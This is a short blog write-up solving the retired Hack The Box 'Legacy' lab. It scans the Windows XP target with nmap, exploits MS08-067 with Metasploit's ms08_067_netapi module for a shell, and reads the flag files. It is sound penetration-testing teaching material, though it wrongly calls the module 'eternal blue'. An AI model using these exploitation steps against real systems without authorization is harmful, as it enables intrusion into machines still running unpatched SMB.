Hello friends!! Today we are going to solve another
CTF challenge “Legacy” which is lab presented by Hack the Box for
making online penetration practices according to your experience level. They
have collection of vulnerable labs as challenges from beginners to Expert
level. HTB have two partitions of lab i.e. Active and retired since we can’t
submit write up of any Active lab therefore we have chosen retried Legacy lab.
Level: Beginners
Task: find user.txt and root.txt file
in victim’s machine.
Let’s begin the Game!!
Since these labs are online available therefore they
have static IP and IP of Legacy is 10.10.10.4 so let’s begin with nmap port
enumeration.
nmap -sV 10.10.10.4 –open
From given below image, you can observe that we found open
port 139 and 445 denotes that it is windows machine.
When I extract complete result
of nmap I found following details
OS: windows XP
Computer name: Legacy
NetBIOS computer name Legacy
As
we know in windows XP Port 445 was vulnerable to netapi exploit and it was a
remarkable vulnerbality in SMB protcol.
Let confirm SMB vulnerability in victims system using namp script.
nmap --script vuln -p445
10.10.10.4
Awesome!! Victim’s machine is
vulnerable to Ms08-67exploit.
Then I run msfconsole command in terminal and load
metasploit framework for using eternal blue module for exploiting target
machine.
use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netap) >set
rhost 10.10.10.4
msf exploit(windows/smb/ms08_067_netap) >exploit
Awesome!! I have got
unauthorized access of victims command shell through session 1 as
shown in below image.
Inside c:\Document
and Setting \john \Desktop I found user.txt file
and used cat “file name” command for reading this file.
cat
user.txt
Great!! We got our 1st flag
successfully
Inside c:\Document
and Setting \Administrator\Desktop I found root.txt file
and used cat “file name” command for reading this file.
cat
root.txt
Great!! We got our 2nd flag successfully
0 comments:
Post a Comment